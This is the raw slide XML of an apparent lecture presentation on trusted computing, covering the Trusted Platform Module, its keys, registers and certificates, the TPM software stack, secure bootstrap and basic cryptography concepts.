          <p:cNvPr id="25" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="5764789"/>
            <a:ext cx="1752600" cy="1069975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CPU with trusted mode (Palladium, TrustZone)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="4456689"/>
            <a:ext cx="914400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="30196"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>virtualization</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mtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172995" y="1124464"/>
            <a:ext cx="8723870" cy="5200135"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Main idea: platform can prove that it is running the expected executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Example Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>More robust reputation in P2P</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Detect misbehaving users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Electronic payments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Detect double spending of money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Digital Rights Management (DRM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Enforce copyright on content (music, video)</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dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HW Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1197204"/>
            <a:ext cx="8001000" cy="4974996"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCPA (Trusted Computing Platform Alliance)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Renamed to Trusted Computing Group (TCG)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Microsoft Palladium</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Renamed to Next-Generation Secure Computing Base (NGSCB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>LaGrande</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ARM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:ea typeface="宋体"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TPCA</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Trusted Computing Platform Alliance (TPCA) was formed in 1999; members include Intel, Microsoft, Infineon, National, Atmel, and a large number of other organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Objective: provide a platform root of trust, which uniquely identifies a particular platform, and provides various crypto capabilities, including </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Secure bootstrap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Platform attestation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Protected storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Trusted Platform Module (TPM) is a HW instantiation of the TCPA specification.</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12/19/2012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smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Trusted Platform Module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1414913"/>
            <a:ext cx="5274644" cy="4817097"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Cryptographic operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Hashing: SHA-1, HMAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Random number generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Asymmetric key generation: RSA (512, 1024, 2048)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Asymmetric encryption/ decryption: RSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" i="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Symmetric encryption/ decryption: DES, 3DES (AES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Tamper resistant (hash and key) storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>TPM provides the platform root of trust. Its trust can be extended to other parts of the platform by building a chain of trust, where each link extends its trust to the next one</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23553" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5101389" y="1230528"/>
            <a:ext cx="4042611" cy="5008011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Content Placeholder 25" descr="ST19NP18-TPM_p2096shigh.jpeg.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317439" y="4229283"/>
            <a:ext cx="3532187" cy="2493963"/>
          </a:xfr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TPM Components</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122548" y="1241659"/>
            <a:ext cx="4967926" cy="5616341"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Endorsement Key (EK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>a public/private key-pair unique to the particular TPM and therefore the particular platform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Attestation Identity Key (AIK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>provides platform authentication to a service provider.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Platform Configuration Registers (PCR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Provides software integrity measurement, storage, and reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Three types of certificates may be stored in the TPM are: Endorsement Certificate (Endorsement Cert), Platform Cert, and Conformance Cert.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The Endorsement Cert contains the public key of the EK. The purpose of the Endorsement Cert is to provide attestation that the particular TPM is genuine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The Platform Cert is provided by the platform vendor and provides attestation that the security components of the platform are genuine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The Conformance Cert is provided by the platform vendor or an evaluation lab. It provides attestation by an accredited party as to the security properties of the platform.</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12/19/2012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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5061855" y="1376314"/>
            <a:ext cx="4082145" cy="4845378"/>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TPM SW Stack (TSS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230736" y="1350236"/>
            <a:ext cx="4331837" cy="5153114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The TCPA Software Stack (TSS) is comprised of modules and components that provide the supporting functionality to the TPM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Applications can utilize the TPM either through the MS-CAPI standard interface, or by directly implementing a communication interface with TSS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12/19/2012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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4548068" y="2404228"/>
            <a:ext cx="4331981" cy="3459244"/>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Microsoft* CAPI TPM Crypto Service Provider (CSP)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230736" y="1350236"/>
            <a:ext cx="3841643" cy="5153114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Microsoft Cryptographic API (CAPI) provides services that enable application developers to add cryptography to Win32 applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cryptographic operations are performed by independent modules known as Cryptographic Service Providers (CSPs). One CSP, the Microsoft* RSA Base Provider, is bundled with the OS.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12/19/2012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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4133850" y="1486195"/>
            <a:ext cx="5010150" cy="3829050"/>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Usage Models</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Secure bootstrap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Hardware Protected Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Binding Information to the Platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Attestation (Platform Authentication)</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12/19/2012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75272146-600C-49D1-8CFF-E753D591EFBB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Basics of Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5114925"/>
            <a:ext cx="9144000" cy="971550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Relationship between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7173" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="504825" y="1890472"/>
            <a:ext cx="8239125" cy="3194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dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Secure bootstrap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Oval 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2279808"/>
            <a:ext cx="1066800" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="10196"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>BIOS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
